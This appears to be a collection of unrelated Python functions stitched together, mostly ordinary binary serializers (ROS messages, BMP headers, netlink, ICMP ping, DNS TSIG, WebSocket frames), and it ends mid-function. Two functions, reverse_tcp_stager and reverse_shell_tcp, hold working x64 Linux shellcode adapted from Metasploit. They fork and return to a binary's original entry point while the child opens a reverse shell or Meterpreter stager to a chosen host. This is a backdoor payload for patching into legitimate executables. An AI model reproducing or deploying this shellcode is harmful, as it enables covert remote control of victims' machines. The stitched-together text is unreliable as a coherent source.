def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
        # agent_one: length-prefixed (uint32 LE) UTF-8 string.
        _x = self.agent_one
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode("utf-8")
            length = len(_x)
        buff.write(struct.pack("<I%ss" % length, length, _x))
        # agent_two: same length-prefixed string encoding.
        _x = self.agent_two
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode("utf-8")
            length = len(_x)
        buff.write(struct.pack("<I%ss" % length, length, _x))
        # Six float64 scalars packed with the precompiled _struct_6d format.
        _x = self
        buff.write(
            _struct_6d.pack(_x.rotationx, _x.rotationy, _x.angle,
                            _x.referencex, _x.referencey, _x.evaluation)
        )
    except struct.error as se:
        # Route packing failures (with the offending value) through the
        # generated-code type checker instead of raising directly.
        self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
    except TypeError as te:
        self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def readBlock(self, adr, length, filename):
    """Read *length* 16-bit words from device memory at *adr* into *filename*.

    Sends the READ16 command byte, then the big-endian address and word
    count, echo-checking each write against the device's reply.  The
    returned data arrives with each byte pair swapped, so it is
    re-swapped before being written to disk.

    :param adr: start address on the device
    :param length: number of 16-bit words to read
    :param filename: destination file path
    :raises Exception: when a device echo does not match what was sent
    """
    print('Read block')
    pkt = struct.pack('>I', adr)
    command = struct.pack('B', self.MTK_COMMAND_READ16)
    self._port.write(command)
    # Fix: error messages previously said "resonse".
    if self._port.read(1) != command:
        raise Exception('Invalid response command')
    self._port.write(pkt)
    if self._port.read(4) != pkt:
        raise Exception('Invalid response address')
    pkt = struct.pack('>I', length)
    self._port.write(pkt)
    if self._port.read(4) != pkt:
        raise Exception('Invalid response length')
    raw = self._port.read(length * 2)
    # Swap each byte pair (device sends words little-endian).
    swapped = ''.join([c for pair in zip(raw[1::2], raw[::2]) for c in pair])
    # Fix: file() is Python-2-only and the handle leaked if an echo check
    # raised before close(); open the file only once the data is in hand.
    with open(filename, 'wb') as out:
        out.write(swapped)
def __init__(self, is_binary, file_name):
    # SFP container header: 3-byte magic "SFP", a one-byte binary/text
    # flag, the wrapped file's name, and an initially empty payload.
    self.magic = struct.pack('3s', "SFP")       # Python 2: pack accepts str
    self.file_type = struct.pack('b', is_binary)
    self.sfile_name = file_name                 # name of the wrapped file
    self.data = ''                              # payload bytes
    self.sfilesize = 0                          # payload size in bytes
    # presumably fills self.data / self.sfilesize -- defined elsewhere; confirm
    self.random_data()
def __init__(self, fp, bits, width, height):
    # Write a BMP file header + BITMAPINFOHEADER to *fp* for a 1-, 8- or
    # 24-bit image, leaving fp positioned at the start of the pixel data.
    self.fp = fp
    self.bits = bits
    self.width = width
    self.height = height
    # Palette entries: 1-bit -> 2, 8-bit -> 256 (grayscale), 24-bit -> none.
    if bits == 1:
        ncols = 2
    elif bits == 8:
        ncols = 256
    elif bits == 24:
        ncols = 0
    else:
        raise ValueError(bits)
    # Rows are padded to a 32-bit boundary (align32 assumed to round up to a
    # multiple of 4 -- TODO confirm).  Python 2 integer division intended.
    self.linesize = align32((self.width*self.bits+7)/8)
    self.datasize = self.linesize * self.height
    # BITMAPINFOHEADER: 40 bytes, one plane, no compression.
    info = struct.pack('<IiiHHIIIIII', 40, self.width, self.height, 1, self.bits, 0, self.datasize, 0, 0, 0, 0)
    assert len(info) == 40, len(info)
    # BITMAPFILEHEADER: 'BM' magic, total file size, pixel-data offset.
    # NOTE(review): the offset (14+40) and total size ignore the palette
    # written below, which looks wrong for 1/8-bit images -- confirm.
    header = struct.pack('<ccIHHI', 'B', 'M', 14+40+self.datasize, 0, 0, 14+40)
    assert len(header) == 14, len(header)
    self.fp.write(header)
    self.fp.write(info)
    # Palettes (Python 2 str writes): black/white, or a grayscale ramp.
    if ncols == 2:
        self.fp.write('\x00\x00\x00\xff\xff\xff')
    elif ncols == 256:
        for i in xrange(256):
            self.fp.write(struct.pack('bbb', i,i,i))
    # Remember where the pixel data starts and ends.
    self.pos0 = self.fp.tell()
    self.pos1 = self.pos0 + self.datasize
    return
def proc_gentlink(self):
    #get GELINK Header info
    # Resolve the generic-netlink family for "TASKSTATS" by sending a
    # CTRL_CMD_GETFAMILY request and walking the reply's attributes.
    cmd='TASKSTATS\0'
    mlen=len(cmd) + 4  # attribute payload + 4-byte nlattr header
    msg_ts=array.array(str('B'))
    # genlmsghdr: command byte, version byte, two pad bytes.
    msg_ts.fromstring(struct.pack("BBxx", CTRL_CMD_GETFAMILY, 0))
    # nlattr header: total length, type CTRL_ATTR_FAMILY_NAME.
    msg_ts.fromstring(struct.pack("HH", mlen, CTRL_ATTR_FAMILY_NAME))
    msg_ts.fromstring(cmd)
    tmp=((4 - (len(msg_ts) % 4)) & 0x3)  # NOTE(review): computed but never used
    # Pad the attribute out to a 4-byte boundary.
    msg_ts.fromstring('\0' * ((4 - (len(cmd) % 4)) & 0x3))
    # nlmsghdr: total length (payload + 16-byte header), NETLINK_GENERIC,
    # request flag, sequence 0, pid 0.
    nlmhdr_msg=array.array(str('B'),struct.pack(str('=IHHII'), len(msg_ts) + 16, NETLINK_GENERIC, NLM_F_REQUEST, 0, 0))
    nlmhdr_msg.extend(msg_ts)
    self.socket.send(nlmhdr_msg)
    data = self.socket.recv(65536)#(16384)
    data=self.unpack_nlhdr(data)
    data=self.unpack_genlhdr(data)
    # Consume every attribute remaining in the reply.
    while len(data) > 0:
        data=self.unpack_attr_hdr(data)
    # if self.flags & 0x2 == 0:
    if debug>0:
        print "End of receiving message!"
    return
def ConvertXmlToTHCsv(xmlfile):
    """Convert a THCsv XML document back into the packed binary format.

    The binary file is written next to *xmlfile* with its extension
    stripped.  Layout (all uint32 little-endian): row count, then per row
    a cell count followed by length-prefixed cp936-encoded cell strings.

    :param xmlfile: path to an XML file whose root element is ``THCsv``
    """
    tree = ET.parse(xmlfile)
    root = tree.getroot()
    if root.tag != 'THCsv':
        # Not a THCsv document: silently skip (original contract).
        return
    rows = []
    for row in root:
        # Each cell's string lives in its <sc> child element.
        rows.append([text.find('sc').text for text in row])
    # Fix: the output handle was never closed (and shadowed the csv
    # module name); use a context manager instead.
    with open(os.path.splitext(xmlfile)[0], 'wb') as out:
        out.write(struct.pack('<I', len(rows)))
        for row in rows:
            out.write(struct.pack('<I', len(row)))
            for text in row:
                encoded = text.encode('936')  # '936' is an alias of the GBK codec
                out.write(struct.pack('<I', len(encoded)))
                out.write(encoded)
def serialize(self):
    """Serialize the transaction: nVersion, vin, vout, nLockTime.

    Returns the wire-format byte string.  Fix: the original seeded the
    accumulator with a text ``""``, which raises TypeError on Python 3
    when struct.pack's bytes are appended; ``b""`` behaves identically
    on Python 2 (where ``b""`` is ``str``).
    """
    return b"".join([
        struct.pack("<i", self.nVersion),
        ser_vector(self.vin),      # inputs, project serializer
        ser_vector(self.vout),     # outputs, project serializer
        struct.pack("<I", self.nLockTime),
    ])
def reverse_tcp_stager(self, flItms, CavesPicked={}):
    """
    FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
    Modified from metasploit payload/linux/x64/shell/reverse_tcp
    to correctly fork the shellcode payload and continue normal execution.
    """
    # NOTE(review): CavesPicked is a mutable default argument; it is not
    # mutated here, but confirm callers before relying on that.
    if self.PORT is None:
        print ("Must provide port")
        return False
    #64bit shellcode
    # fork(): the parent jumps back to the binary's original entry point,
    # the child falls through into the stager below.
    self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c"
    self.shellcode1 += "\x48\xBD"  # movabs rbp, <original e_entry>
    self.shellcode1 += struct.pack("<Q", self.e_entry)
    self.shellcode1 += "\xff\xe5"  # jmp rbp
    # Stager body (from the metasploit payload), up to the sockaddr.
    self.shellcode1 += ("\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
    "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x56\x50\x6a\x29\x58\x99\x6a"
    "\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\xb9\x02\x00")
    # sockaddr_in tail: port in network byte order, then the IPv4 address.
    self.shellcode1 += struct.pack("!H", self.PORT)
    self.shellcode1 += self.pack_ip_addresses()
    self.shellcode1 += ("\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f"
    "\x05\x59\x5e\x5a\x0f\x05\xff\xe6")
    self.shellcode = self.shellcode1
    return (self.shellcode1)
def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
        # Header: seq, stamp.secs, stamp.nsecs as three uint32s.
        _x = self
        buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
        # header.frame_id: length-prefixed UTF-8 string.
        _x = self.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # Four int32 scalar fields.
        _x = self
        buff.write(_struct_4i.pack(_x.count, _x.nch, _x.length, _x.data_bytes))
        # src: array of records, each a length-prefixed float32 array.
        length = len(self.src)
        buff.write(_struct_I.pack(length))
        for val1 in self.src:
            length = len(val1.wavedata)
            buff.write(_struct_I.pack(length))
            pattern = '<%sf'%length
            buff.write(struct.pack(pattern, *val1.wavedata))
    except struct.error as se:
        self._check_types(se)
    except TypeError as te:
        self._check_types(te)
def mix_files(a, b, c, chann = 2, phase = -1.):
    # Mix two 44.1 kHz 16-bit WAV files sample-by-sample into output *c*.
    # chann < 2 writes the mono average; otherwise a stereo 30/70
    # cross-mix is written with *phase* applied to the 30% component.
    f1 = wave.open(a,'r')
    f2 = wave.open(b,'r')
    f3 = wave.open(c,'w')
    f3.setnchannels(chann)
    f3.setsampwidth(2)   # 16-bit samples
    f3.setframerate(44100)
    f3.setcomptype('NONE','Not Compressed')
    # Only mix up to the length of the shorter input.
    frames = min(f1.getnframes(), f2.getnframes())
    print "Mixing files, total length %.2f s..." % (frames / 44100.)
    d1 = f1.readframes(frames)
    d2 = f2.readframes(frames)
    for n in range(frames):
        # Progress marker every 5 seconds of audio.
        if not n%(5*44100):
            print n // 44100, 's'
        if chann < 2:
            # Mono: average the two 16-bit samples.
            # NOTE(review): struct.pack('h', <float>) relies on Python 2
            # accepting floats for integer codes -- confirm interpreter.
            d3 = struct.pack('h',
                .5 * (struct.unpack('h', d1[2*n:2*n+2])[0] +
                      struct.unpack('h', d2[2*n:2*n+2])[0]))
        else:
            # Stereo: left = phase*0.3*in1 + 0.7*in2, right mirrored.
            d3 = ( struct.pack('h',
                    phase * .3 * struct.unpack('h', d1[2*n:2*n+2])[0] +
                    .7 * struct.unpack('h', d2[2*n:2*n+2])[0]) +
                   struct.pack('h',
                    .7 * struct.unpack('h', d1[2*n:2*n+2])[0] +
                    phase * .3 * struct.unpack('h', d2[2*n:2*n+2])[0]) )
        f3.writeframesraw(d3)
    # NOTE(review): f1 and f2 are never closed.
    f3.close()
def write_mmio_reg(self, phys_address, size, value):
    """Write *value* to the MMIO register at *phys_address*.

    The value is packed into *size* bytes (native byte order, masked to
    the field width for sizes 4/2/1) and handed to write_phys_mem with
    the 64-bit address split into high/low dwords.

    Returns False for unsupported sizes, otherwise whatever
    write_phys_mem returns.
    """
    narrow_formats = {
        4: ('=I', 0xFFFFFFFF),
        2: ('=H', 0xFFFF),
        1: ('=B', 0xFF),
    }
    if size == 8:
        buf = struct.pack('=Q', value)
    elif size in narrow_formats:
        fmt, mask = narrow_formats[size]
        buf = struct.pack(fmt, value & mask)
    else:
        return False
    high = (phys_address >> 32) & 0xFFFFFFFF
    low = phys_address & 0xFFFFFFFF
    return self.write_phys_mem(high, low, size, buf)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
    """
    Modified from metasploit payload/linux/x64/shell_reverse_tcp
    to correctly fork the shellcode payload and continue normal execution.
    """
    # NOTE(review): CavesPicked is a mutable default argument; it is not
    # mutated here, but confirm callers before relying on that.
    if self.PORT is None:
        print ("Must provide port")
        return False
    #64bit shellcode
    # fork(): the parent resumes at the binary's original entry point,
    # the child runs the reverse shell below.
    self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c"
    self.shellcode1 += "\x48\xBD"  # movabs rbp, <original e_entry>
    self.shellcode1 += struct.pack("<Q", self.e_entry)
    self.shellcode1 += "\xff\xe5"  # jmp rbp
    # socket()/connect() prologue up to the sockaddr.
    self.shellcode1 += ("\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
    "\x48\x97\x48\xb9\x02\x00")
    # sockaddr_in tail: port in network byte order, then the IPv4 address.
    self.shellcode1 += struct.pack("!H", self.PORT)
    self.shellcode1 += self.pack_ip_addresses()
    # connect, dup2 stdio over the socket, execve("/bin/sh").
    self.shellcode1 += ("\x51\x48\x89"
    "\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
    "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
    "\x0f\x05")
    self.shellcode = self.shellcode1
    return (self.shellcode1)
def get_lockdata():
    # Build the platform-specific struct flock blob passed to fcntl for a
    # whole-file write lock (F_WRLCK), or None where unsupported.
    if sys.platform.startswith('atheos'):
        start_len = "qq"
    else:
        # Probe for large-file support to size l_start / l_len.
        try:
            os.O_LARGEFILE
        except AttributeError:
            start_len = "ll"
        else:
            start_len = "qq"
    if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd', 'bsdos'))
        or sys.platform == 'darwin'):
        # BSD layout: l_start, l_len, l_pid come before l_type/l_whence.
        if struct.calcsize('l') == 8:
            off_t = 'l'
            pid_t = 'i'
        else:
            off_t = 'lxxxx'  # 32-bit long padded out to 8 bytes
            pid_t = 'l'
        lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0, fcntl.F_WRLCK, 0)
    elif sys.platform in ['aix3', 'aix4', 'hp-uxB', 'unixware7']:
        # SysV-style layout: l_type first, then offsets/pids.
        lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0)
    elif sys.platform in ['os2emx']:
        lockdata = None  # no flock structure on OS/2
    else:
        # Default (Linux-style) layout: l_type, l_whence, l_start, l_len, ...
        lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0)
    if lockdata:
        if verbose:
            print 'struct.pack: ', repr(lockdata)
    return lockdata
def update_sha(sha, f):
    """Feed hash object *sha* with *f*'s full contents plus its size.

    When *f* is falsy, only a zero size marker (native uint32) is
    hashed.  The file is rewound to the start after being read.
    """
    if not f:
        sha.update(pack('I', 0))
        return
    sha.update(f.read())
    f.seek(0)
    sha.update(pack('I', filesize(f)))
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
        # Scalars a, b via the precompiled int+float struct.
        _x = self
        buff.write(_struct_if.pack(_x.a, _x.b))
        # c: length-prefixed string; on Python 3 bytes are written with
        # the 'B' format, on Python 2 with the 's' format.
        _x = self.c
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        if python3:
            buff.write(struct.pack('<I%sB'%length, length, *_x))
        else:
            buff.write(struct.pack('<I%ss'%length, length, _x))
        # d: fixed-size numpy array written as raw bytes.
        buff.write(self.d.tostring())
        # e: variable-length float64 array, length prefix then raw bytes.
        length = len(self.e)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd'%length  # NOTE(review): built but unused (tostring below)
        buff.write(self.e.tostring())
    except struct.error as se:
        self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
    except TypeError as te:
        self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def tsigverify(pkt, keys, vertime = None):
    # Verify the TSIG signature record on DNS packet *pkt* (RFC 2845).
    # Returns the matching key on success, otherwise a protocol error
    # code (FORMERR / BADKEY / BADSIG / BADTIME).  vertime == 0 disables
    # the timestamp check; None means "now".
    if vertime is None:
        vertime = int(time.time())
    if len(pkt.adlist) < 1:
        return proto.FORMERR
    # The TSIG record must be the last record in the additional section;
    # strip it before re-encoding the packet for verification.
    sr = pkt.adlist[-1]
    pkt.adlist = pkt.adlist[:-1]
    if not sr.head.istype("TSIG") or sr.head.rclass != rec.CLASSANY:
        return proto.FORMERR
    # Find the key named in the record.
    for key in keys:
        if key.name == sr.head.name:
            break
    else:
        return proto.BADKEY
    if key.algo.cname != sr.data["algo"]:
        return proto.BADKEY
    pkt.tsigctx = ctx = tsigctx(key, pkt, sr)
    other = sr.data["other"]
    # Rebuild the exact byte string that was signed: the packet without
    # the TSIG record followed by the TSIG variables.
    msg = pkt.encode()
    msg += key.name.canonwire()
    msg += struct.pack(">HL", rec.CLASSANY, 0)
    msg += key.algo.cname.canonwire()
    msg += struct.pack(">Q", sr.data["stime"])[-6:]  # 48-bit signing time
    msg += struct.pack(">3H", sr.data["fudge"], sr.data["err"], len(other))
    msg += other
    digest = key.sign(msg)
    if digest != sr.data["mac"]:
        pkt.tsigctx = proto.BADSIG
        return proto.BADSIG
    if vertime != 0:
        # Signing time must be within the record's fudge window.
        if abs(vertime - sr.data["stime"]) > sr.data["fudge"]:
            pkt.tsigctx = proto.BADTIME
            return proto.BADTIME
    return key
def writeData(self, f):
    """Write the skin data (bind shape, joint references, bind poses) to *f*.

    Records the stream position where this section starts in self.offset.
    Bounding box and bounding sphere are intentionally omitted.
    """
    self.offset = f.tell()
    print("BindShape "+str(len(self.bindShape)))
    # Bind-shape matrix components as little-endian float32s.
    for component in self.bindShape:
        f.write(struct.pack("<f", component))
    # Joint reference strings, each written as '#'-prefixed ASCII with a
    # preceding length field (length includes the '#').
    f.write(struct.pack("<I", len(self.joints)))
    for joint in self.joints:
        f.write(struct.pack("<I", len(joint.reference) + 1))
        f.write(bytearray('#', "ascii"))
        f.write(bytearray(joint.reference, "ascii"))
    # Bind-pose matrices: 16 float32s per joint, preceded by the total count.
    f.write(struct.pack("<I", len(self.joints) * 16))
    for component in self.jointBindPoses:
        f.write(struct.pack("<f", component))
    return
def encode_hybi(buf, opcode, base64=False):
    """Encode one HyBi (RFC 6455) WebSocket frame.

    Opcodes: 0x0 continuation, 0x1 text (base64-encodes *buf*),
    0x2 binary, 0x8 close, 0x9 ping, 0xA pong.

    Returns (frame_bytes, header_length, 0).
    """
    payload = b64encode(buf) if base64 else buf
    first_byte = 0x80 | (opcode & 0x0f)  # FIN bit + opcode nibble
    n = len(payload)
    # Header grows with payload size: 7-bit, 16-bit, or 64-bit length.
    if n <= 125:
        header = pack('>BB', first_byte, n)
    elif n < 65536:
        header = pack('>BBH', first_byte, 126, n)
    else:
        header = pack('>BBQ', first_byte, 127, n)
    return header + payload, len(header), 0
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
        # std_msgs/Header: seq + stamp as three uint32s.
        _x = self
        buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
        # header.frame_id: length-prefixed UTF-8 string.
        _x = self.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # GoalID stamp (secs, nsecs).
        _x = self
        buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs))
        # GoalID id string.
        _x = self.status.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # Status code (uint8) followed by the status text string.
        buff.write(_struct_B.pack(self.status.status))
        _x = self.status.text
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # Feedback payload: a single float32.
        buff.write(_struct_f.pack(self.feedback.percent_complete))
    except struct.error as se:
        self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
    except TypeError as te:
        self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def test_wrap_round_robin(self):
    # TokenAwarePolicy wrapping RoundRobinPolicy should return the
    # replicas for a routing key first, then the remaining hosts; with
    # no query it should fall back to the child policy over all hosts.
    cluster = Mock(spec=Cluster)
    cluster.metadata = Mock(spec=Metadata)
    hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
    for host in hosts:
        host.set_up()

    def get_replicas(keyspace, packed_key):
        # The routing key encodes a start index; the two replicas are
        # taken cyclically from there.
        index = struct.unpack('>i', packed_key)[0]
        return list(islice(cycle(hosts), index, index + 2))

    cluster.metadata.get_replicas.side_effect = get_replicas
    policy = TokenAwarePolicy(RoundRobinPolicy())
    policy.populate(cluster, hosts)
    for i in range(4):
        query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name')
        qplan = list(policy.make_query_plan(None, query))
        replicas = get_replicas(None, struct.pack('>i', i))
        other = set(h for h in hosts if h not in replicas)
        # Replicas come first and in order; the rest follow in any order.
        self.assertEqual(replicas, qplan[:2])
        self.assertEqual(other, set(qplan[2:]))
    # Should use the secondary policy
    for i in range(4):
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan), set(hosts))
def getRSSI(self):
    """Return the RSSI of the connection to this device, or None if the
    device cannot be reached or queried (used as a proximity check)."""
    addr = self.address
    # Open hci socket
    hci_sock = bt.hci_open_dev()
    hci_fd = hci_sock.fileno()
    # Connect to device (to whatever you like)
    bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bt_sock.settimeout(10)
    result = bt_sock.connect_ex((addr, 1)) # PSM 1 - Service Discovery
    try:
        # Get ConnInfo: look up the ACL connection handle for this address.
        reqstr = struct.pack("6sB17s", bt.str2ba(addr), bt.ACL_LINK, "\0" * 17)
        request = array.array("c", reqstr )
        handle = fcntl.ioctl(hci_fd, bt.HCIGETCONNINFO, request, 1)
        handle = struct.unpack("8xH14x", request.tostring())[0]
        # Get RSSI via the HCI Read RSSI command for that handle.
        cmd_pkt=struct.pack('H', handle)
        rssi = bt.hci_send_req(hci_sock, bt.OGF_STATUS_PARAM,
                     bt.OCF_READ_RSSI, bt.EVT_CMD_COMPLETE, 4, cmd_pkt)
        rssi = struct.unpack('b', rssi[3])[0]  # signed byte at offset 3
        # Close sockets
        bt_sock.close()
        hci_sock.close()
        return rssi
    except Exception, e:
        # NOTE(review): broad except maps any failure (device out of
        # range, ioctl error, ...) to None; the sockets leak on this path.
        return None
def send_one_ping(my_socket, dest_addr, ID):
    """
    Send one ping to the given >dest_addr<.
    """
    dest_addr = socket.gethostbyname(dest_addr)
    # Header is type (8), code (8), checksum (16), id (16), sequence (16)
    my_checksum = 0
    # Make a dummy header with a zero checksum first.
    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)
    bytesInDouble = struct.calcsize("d")
    # Payload: the current time followed by filler, 192 bytes total,
    # so the receiver can compute the round-trip time.
    data = (192 - bytesInDouble) * "Q"
    data = struct.pack("d", time.time()) + data
    # Calculate the checksum on the data and the dummy header.
    my_checksum = checksum(header + data)
    # Now that we have the right checksum, we put that in. It's just easier
    # to make up a new header than to stuff it into the dummy.
    header = struct.pack(
        "bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1
    )
    packet = header + data
    my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1
def sendCMDreceiveATT(self, data_length, code, data):
    # Send a MultiWii Serial Protocol (MSP) frame ('$M<' + size + code +
    # payload + XOR checksum) and read back an attitude reply, updating
    # and returning self.attitude.  Python 2 only (ord on str, int '/').
    checksum = 0
    total_data = ['$', 'M', '<', data_length, code] + data
    # XOR checksum over size, code and payload (everything after '<').
    for i in struct.pack('<2B%dh' % len(data), *total_data[3:len(total_data)]):
        checksum = checksum ^ ord(i)
    total_data.append(checksum)
    try:
        start = time.time()
        b = None
        b = self.ser.write(struct.pack('<3c2B%dhB' % len(data), *total_data))
        # Wait for the '$'-led reply header (3 bytes total).
        while True:
            header = self.ser.read()
            if header == '$':
                header = header+self.ser.read(2)
                break
        datalength = struct.unpack('<b', self.ser.read())[0]
        code = struct.unpack('<b', self.ser.read())
        data = self.ser.read(datalength)
        # Payload is a run of little-endian int16s (Py2 integer division).
        temp = struct.unpack('<'+'h'*(datalength/2),data)
        self.ser.flushInput()
        self.ser.flushOutput()
        elapsed = time.time() - start
        # Angles arrive in tenths of a degree; heading in degrees.
        self.attitude['angx']=float(temp[0]/10.0)
        self.attitude['angy']=float(temp[1]/10.0)
        self.attitude['heading']=float(temp[2])
        self.attitude['elapsed']=round(elapsed,3)
        self.attitude['timestamp']="%0.2f" % (time.time(),)
        return self.attitude
    except Exception, error:
        # NOTE(review): errors are silently swallowed and None is
        # returned; the debug prints were left commented out.
        #print "\n\nError in sendCMDreceiveATT."
        #print "("+str(error)+")\n\n"
        pass
def writev5_1conflicteddata(conflictedentries, reucdata, dirdata):
    # Write the v5 conflicted-entry records to the global file writer,
    # recording for each affected path the record's file offset ("cr")
    # and bumping its conflict count ("ncr") in dirdata.
    global writtenbytes
    for d in sorted(conflictedentries):
        # NOTE(review): this loop iterates the keys of dict *d* and never
        # uses f -- looks like leftover/placeholder code; confirm intent.
        for f in d:
            if d["pathname"] == "":
                filename = d["filename"]
            else:
                filename = d["pathname"] + "/" + d["filename"]
            dirdata[filename]["cr"] = fw.tell()
            try:
                dirdata[filename]["ncr"] += 1
            except KeyError:
                dirdata[filename]["ncr"] = 1
            fwrite(d["pathname"] + d["filename"])
            fwrite("\0")
            stages = set()
            fwrite(struct.pack("!b", 0))
            # Two mode slots; a non-zero mode marks that stage as present.
            for i in xrange(0, 2):
                fwrite(struct.pack("!i", d["mode"]))
                if d["mode"] != 0:
                    stages.add(i)
            for i in sorted(stages):
                print i  # NOTE(review): debug output left in
                fwrite(binascii.unhexlify(d["sha1"]))
            writecrc32()
            for f in reucdata[d]:
                print f  # NOTE(review): debug output left in
    return dirdata
def serialize(self):
    """Serialize a network address record.

    Layout: nServices (uint64 LE), the reserved padding bytes, the IPv4
    address (4 bytes), and the port in network byte order (uint16 BE).

    Fix: the original accumulated onto a text ``""``, which raises
    TypeError on Python 3 when the struct.pack bytes are appended;
    plain bytes concatenation is identical on Python 2.
    """
    return (
        struct.pack("<Q", self.nServices)
        + self.pchReserved
        + socket.inet_aton(self.ip)
        + struct.pack(">H", self.port)
    )
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
        # std_msgs/Header: seq + stamp as three uint32s.
        _x = self
        buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
        # header.frame_id: length-prefixed UTF-8 string.
        _x = self.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # GoalID stamp (secs, nsecs).
        _x = self
        buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs))
        # GoalID id string.
        _x = self.status.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # Status code (uint8) followed by the status text string.
        buff.write(_struct_B.pack(self.status.status))
        _x = self.status.text
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # Feedback payload: three float32s.
        _x = self
        buff.write(_struct_3f.pack(_x.feedback.forward_dist_x, _x.feedback.forward_dist_y, _x.feedback.rotation_dist))
    except struct.error as se:
        self._check_types(se)
    except TypeError as te:
        self._check_types(te)
def writev5_0directories(paths, treeextensiondata):
    # Write the v5 directory records via the global writer, returning a
    # dict that maps each path to the file offset where its record starts.
    offsets = dict()
    subtreenr = dict()
    # Calculate subtree numbers
    # (count of immediate child directories for every ancestor path).
    for p in sorted(paths, reverse=True):
        splited = p.split("/")
        if p not in subtreenr:
            subtreenr[p] = 0
        if len(splited) > 1:
            i = 0
            path = ""
            while i < len(splited) - 1:
                path += "/" + splited[i]
                i += 1
                if path[1:] not in subtreenr:
                    subtreenr[path[1:]] = 1
                else:
                    subtreenr[path[1:]] += 1
    for p in paths:
        offsets[p] = writtenbytes
        # 8-byte placeholder field written before the directory name --
        # presumably patched later; confirm against the writer's format.
        fwrite(struct.pack("!Q", 0))
        fwrite(p.split("/")[-1] + "\0")
        p += "/"
        if p in treeextensiondata:
            # Cache-tree data available: entry count, subtree count, and
            # (when valid) the tree's SHA-1.
            fwrite(struct.pack("!ll", int(treeextensiondata[p]["entry_count"]), int(treeextensiondata[p]["subtrees"])))
            if (treeextensiondata[p]["entry_count"] != "-1"):
                fwrite(binascii.unhexlify(treeextensiondata[p]["sha1"]))
        else:
            # If there is no cache-tree data we assume the entry is invalid
            fwrite(struct.pack("!ii", -1, subtreenr[p.strip("/")]))
    return offsets
def _write_key_sect(self, outfile):
    """Write the key section: preamble (plus adler32 checksum for v2.0),
    the key-block index, then every key block.

    :param outfile: a file-like object, opened in binary mode.
    """
